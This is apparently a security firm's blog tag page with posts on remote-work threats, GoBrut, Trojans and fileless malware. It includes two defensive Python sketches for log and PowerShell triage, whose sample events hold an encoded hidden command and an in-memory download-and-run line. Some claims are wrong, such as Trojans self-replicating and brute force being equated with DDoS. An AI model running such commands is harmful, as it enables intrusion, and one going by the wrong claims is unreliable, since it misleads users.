Posts Tagged Cyber Attack

Emerging Cyber Security Threats

2020 has witnessed a great change in the work environment of organizations, with an increase in the number of remote and work-from-home employees. This change in dynamics has paved the way for new cyber security threats along with the re-emergence of some old threats.

Here is a list of emerging cyber security threats that organizations should be aware of in order to stay protected:

  • Work-From-Home Attacks: Cyber security attacks on work-from-home or remote employees are not new, but the frequency and extent of such attacks have increased manyfold with the new work culture. Cyber criminals are targeting multiple insecure home networks at the same time to launch widespread breaches of critical systems and services. An effective way to solve this problem is to use Identity & Access Management tools that are capable of analyzing user activity, resource requests, and corporate connectivity behavior.
  • Brute Force Attacks: Brute force attacks have resurfaced as cyber criminals are recognizing the potential of DDoS attacks. Hackers are making use of Simple Service Discovery Protocol (SSDP) and Simple Network Management Protocol (SNMP) to launch a large number of Distributed Denial of Service attacks. Use of botnet swarms has enabled hackers to amplify IP requests to overwhelm organizational networks, leading to slower response times. SNMP attacks can cause more damage as the protocol connects and manages common corporate devices, such as modems, printers, routers and servers. A compromised SNMP service helps attackers bypass firewalls, which exposes all corporate services to risk.
  • Fileless Frameworks: Fileless malware and ransomware attacks are designed to bypass common detection controls and infiltrate key systems by using legitimate platforms or software tools that already exist within corporate networks. This allows hackers to get past common detection methods that scan for malicious files. Use of existing system tools does away with the need for cyber criminals to design an attack framework, which decreases the time required for malware development.
  • Front Line Phishing: One of the biggest news stories of 2021 is the COVID-19 vaccine. People are extensively searching online for more information about the vaccine, such as the current state of the disease, when the vaccine will be given out, who has been approved to get the vaccine, etc. Thus, organizations and individuals should be prepared for phishing attacks fabricated around this topic. Cyber criminals are using COVID-19 vaccine information links as phishing bait in their emails or messages to lure users.

For more information on cyber security threats, contact Centex Technologies at (254) 213 – 4740.


What Is Whaling Attack?

PDF Version: What-Is-Whaling-Attack


Understanding Everything About GoBrut

GoBrut is a computer virus written in the Go programming language. The compilation of GoLang programs generates binaries that have all required dependencies embedded in them. This avoids the need for installed runtimes on the machine and simplifies the multi-platform support of Go applications.

Mode Of Infection

The GoBrut virus infects Windows and Linux machines using the ‘Brute Force’ method.

What Is Brute Force Infection?

A brute force attack is also known as brute force cracking. It involves a computer that tries different combinations of usernames and passwords until it finds the correct combination to unlock the victim machine or network.

There are different types of brute force attacks that can be used by the GoBrut virus. Some common types are:

  • Dictionary Attack: The attacker uses a dictionary of possible passwords to guess the right password.
  • Exhaustive Key Search: The computer tries every possible combination of characters to find the correct password. New computers can brute-force crack an 8-character alphanumeric password (including capitals, lowercase letters, numbers, and special characters) in about two hours.
  • Credential Recycling: In this type of attack, the attackers use the leaked usernames and passwords from other data breaches.

The virus is mainly used to target servers running Content Management Systems (CMS) and technologies such as SSH and MySQL. Here is a list of commonly targeted platforms:

Content Management Systems

  • Bitrix
  • Drupal
  • Joomla
  • Magento
  • WordPress
  • OpenCart

Databases

  • MySQL
  • Postgres

Administration Tools

  • SSH
  • FTP
  • cPanel
  • PhpMyAdmin
  • Webhostmanagement

After-Infection Process:

  • After successful infection, the infected system becomes a part of the GoBrut botnet. It then requests work from the Command and Control server of the botnet.
  • Once the work is received, the infected host brute-forces other systems on the network (named in the work request sent by the botnet owner).
  • This allows lateral spread of the GoBrut virus in the network.
  • After gaining access to a machine’s credentials, the attackers may steal confidential information, photos or other private data.

As the virus uses brute force techniques to steal passwords, machines using low-security passwords are at higher risk of infection. Thus, simple ways to protect a system or network from the GoBrut virus are:

  • Use of strong and reliable passwords.
  • Regular update of passwords after short intervals.
  • Avoid use of common passwords for different systems.
  • Apply access control for remote logins across all services.
  • Update all services and plugins regularly to combat vulnerabilities.
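
The brute force behavior described above leaves a recognizable trail in authentication logs: many failed logins from one source, often across several usernames, sometimes followed by a success. The following Python sketch is an added example, not part of the original post; it assumes OpenSSH-style `sshd` log lines, and the sample log and the threshold of 5 are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample sshd log lines (documentation IP ranges), not real data.
SAMPLE_LOG = """\
Jan 10 03:11:01 web1 sshd[811]: Failed password for root from 203.0.113.7 port 40122 ssh2
Jan 10 03:11:03 web1 sshd[811]: Failed password for root from 203.0.113.7 port 40124 ssh2
Jan 10 03:11:05 web1 sshd[811]: Failed password for invalid user admin from 203.0.113.7 port 40130 ssh2
Jan 10 03:11:07 web1 sshd[811]: Failed password for invalid user deploy from 203.0.113.7 port 40131 ssh2
Jan 10 03:11:09 web1 sshd[811]: Failed password for root from 203.0.113.7 port 40140 ssh2
Jan 10 03:11:12 web1 sshd[811]: Accepted password for root from 203.0.113.7 port 40150 ssh2
Jan 10 08:30:44 web1 sshd[902]: Failed password for alice from 198.51.100.20 port 51514 ssh2
Jan 10 08:30:52 web1 sshd[902]: Accepted password for alice from 198.51.100.20 port 51520 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def find_bruteforce(log_text, threshold=5):
    """Return {ip: summary} for sources with >= threshold failed logins."""
    failures = defaultdict(list)      # ip -> usernames tried, in order
    compromised = defaultdict(set)    # ip -> users accepted after failures
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip].append(user)
        elif failures[ip]:
            # A success from a source that was just guessing is the
            # highest-priority signal: the guess may have worked.
            compromised[ip].add(user)
    report = {}
    for ip, users in failures.items():
        if len(users) >= threshold:
            report[ip] = {
                "failed": len(users),
                "distinct_users": len(set(users)),
                "accepted_after_failures": sorted(compromised[ip]),
            }
    return report

if __name__ == "__main__":
    for ip, summary in find_bruteforce(SAMPLE_LOG).items():
        print(ip, summary)
```

A source that appears in the report with a non-empty `accepted_after_failures` list should be treated as a likely compromised account, not just a noisy scanner.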

For more information on the GoBrut virus, contact Centex Technologies at (254) 213 – 4740.


What Is A Trojan And How To Protect Against It?

A Trojan Virus or Trojan Horse virus is a type of malware that impersonates legitimate files or programs to conceal its true contents. The payload hidden in the Trojan Virus remains unknown to the target user and can act as a delivery vehicle for a variety of threats. Unlike normal viruses, a Trojan virus is capable of replicating itself.

Types Of Trojan Virus

Common types of Trojan Virus are:

  • Backdoor Trojans – This type of Trojan Virus allows hackers to remotely access and control a computer for uploading, downloading, or executing files.
  • Exploit Trojans – These Trojans inject a machine with code that is specifically designed to take advantage of a vulnerability inherent to a specific piece of software.
  • Rootkit Trojans – These Trojans prevent the discovery of malware already infecting a system so that it can cause maximum damage.
  • Banker Trojans – This type of Trojan Virus specifically targets personal information used for banking and other online transactions.
  • Distributed Denial of Service (DDoS) Trojans – These Trojans are programmed to execute DDoS attacks, where a network or machine is disabled by a flood of requests originating from different sources.
  • Downloader Trojans – These are files written to download additional malware, often including more Trojans, onto an infected system.

Detecting A Trojan Virus:

Some common telltale signs of infection by a Trojan Virus are:

  • Poor Device Performance
  • Strange Device Behavior
  • Pop-Up & Spam Interruptions

If the system exhibits any of these behaviors, it is possible that the system is infected with a Trojan Virus. Here are some ways to detect the Trojan:

  • Search the system for programs or applications you don’t remember installing.
  • If you find any unrecognized file names, search online for these file names to check if they are recognized Trojans.
  • Scan the system with antivirus and antimalware software to see if it detects a malicious file.

Defending Against Trojan Virus

As preventive measures, stick to the following practices to defend your system against Trojan Virus:

  • Install an effective internet security solution
  • Refrain from downloading or installing software from a source you don’t trust
  • Never open an attachment or run a program sent in an email from an unrecognized address
  • Keep all software on your computer up to date with the latest patches to avoid vulnerabilities
  • Make sure a Trojan antivirus is installed and running on your system
  • Run regular system scans

For more information on Trojan Virus, contact Centex Technologies at (254) 213 – 4740.


How Does Fileless Malware Work?

Fileless malware is defined as a type of malicious software that does not rely on virus-laden files to infect a host or victim. Instead, it makes use of applications that are commonly used for legitimate and justified activity to execute malicious code in the resident memory of the host. As the software doesn’t create any files, it doesn’t leave any footprints, making it difficult to detect and remove.

Key Targets Of Fileless Malware:

The attackers who employ fileless malware tend to gather a large amount of information in a short span of time. So, they tend to focus the attack on a few key targets. Two systems that are common targets are:

  • PowerShell
  • Windows Management Instrumentation (WMI)

The reasons why attackers choose these systems are:

  • Security technologies trust these utilities
  • Analysts tend to assume that actions of these systems are legitimate
  • These utilities provide complete control over an endpoint
  • Most organizations refrain from shutting down these systems as it would hinder business IT or DevOps work

Working Of Fileless Malware:

The following are a few scenarios in which fileless malware can use a system’s software, applications and protocols to install and execute malicious activity:

  • Phishing emails, malicious downloads, and links that look legitimate are used as points of entry. Once a user clicks on these links, they load into the system’s memory. This enables the hackers to remotely load code to steal confidential data.
  • Malicious code can be injected into applications that are already installed on the system and trusted by the user. After injecting the code, these applications are hijacked and executed by hackers to carry out malicious activity.
  • Attackers create fake websites that mimic legitimate business pages. When a user visits these pages, the websites search for vulnerabilities in the Flash plugin. These vulnerabilities are exploited to run malicious code in the browser memory.

Fileless malware is written directly to the RAM of the infected system and no changes are made on the hard disk. The malware works in memory and the operations end when the system reboots.

Defending Against Fileless Malware Attacks:

The effective way to defend against fileless malware attacks is to adopt an integrated approach that addresses the entire threat lifecycle. Employing a multi-layer defense protocol enables the user to investigate every phase before, during and after the attack.
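
Because nothing is written to disk, one layer of that defense is to review how trusted utilities such as PowerShell are launched rather than to scan files. The following Python sketch is an added example, not part of the original post; the event field names (`parent`, `image`, `cmd`), the sample events and the rule list are assumptions chosen for illustration, and the regular expressions are loose heuristics rather than a complete rule set.

```python
import re

# Constructed process-creation events (parent image, image, command line).
# Paths, placeholders and commands are made up for illustration.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <base64>"},
    {"parent": "wmiprvse.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -NoProfile IEX (New-Object Net.WebClient).DownloadString('<url>')"},
    {"parent": "services.exe", "image": "svchost.exe",
     "cmd": "svchost.exe -k netsvcs"},
]

# Heuristic command-line rules; the first one loosely matches -EncodedCommand
# and its abbreviations (-e, -ec, -enc, ...) but not -ExecutionPolicy.
RULES = [
    ("encoded command", re.compile(r"\s-e[ncodema]*\s", re.I)),
    ("hidden window", re.compile(r"\s-w\w*\s+hidden", re.I)),
    ("runs downloaded text in memory",
     re.compile(r"\b(iex|invoke-expression)\b.*downloadstring", re.I)),
]
# Parents that rarely have a legitimate reason to start PowerShell (assumed list).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wmiprvse.exe"}

def triage(events):
    """Return [(event_index, [reasons])] for PowerShell launches worth review."""
    findings = []
    for i, ev in enumerate(events):
        if ev["image"].lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        reasons = [name for name, rx in RULES if rx.search(ev["cmd"])]
        if ev["parent"].lower() in SUSPICIOUS_PARENTS:
            reasons.append("spawned by " + ev["parent"].lower())
        if reasons:
            findings.append((i, reasons))
    return findings

if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_EVENTS):
        print(index, "; ".join(reasons))
```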

For more information on fileless malware and tips on preventing cyber-attacks on computer networks, contact Centex Technologies at (254) 213 – 4740.
